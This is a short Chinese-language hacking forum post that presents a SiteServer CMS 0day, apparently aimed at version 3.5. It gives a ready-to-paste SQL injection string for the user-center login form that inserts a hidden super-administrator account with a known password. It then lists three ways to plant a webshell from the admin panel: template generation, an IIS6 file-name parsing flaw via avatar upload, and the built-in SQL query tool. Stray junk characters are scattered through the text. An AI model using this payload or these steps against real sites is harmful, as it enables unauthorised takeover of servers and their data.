SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
# q7 Q2 `+ s# {1 ]% [


) K, m& N5 U5 N0 XEXP:

( C% r  [* M8 O# w直接访问UserCenter/login.aspx



! U( i. n4 j/ P" \1 s3 v0 x' M; H用户名处输入：

$ n( a, _7 o% s6 T1 j123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


0 y- D! J, \" ]: R
! S1 b6 N. e( b* {密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
$ y/ G3 }7 F! T
" }) v( l6 e9 S: O

- v2 K/ G! u1 P' V  B! S6 i之后再访问后台SiteServer/login.aspx用插入的用户登陆
: r, Y+ @( Y: v
: F/ p% J: y2 t  l& F3 S2 y

9 }& P% l) a& N7 v* [5 \后台拿webshell的三种方法：
1 [7 W- P& V* r' p$ \$ o5 R# l1 _
1 A" i5 M( `. x# J1 y一、

1 ~9 M# x& b. Y* n5 Y$ p- A站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
/ d0 B5 n+ k* k  {" l9 ~
" I* B& u& Q( |  O3 p成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/

  Y2 L: E% @1 H4 I! l6 g用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
% o. j' r9 [" R$ j, H& T
0 a' r/ b* x8 @, U9 k三、
% u# b# S; E4 k/ N; ]
; f2 i  {  k0 G3 d9 f" _系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
! {# L$ d5 T" c0 ^3 ~' |这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
+ ?+ Y7 s9 X: F) W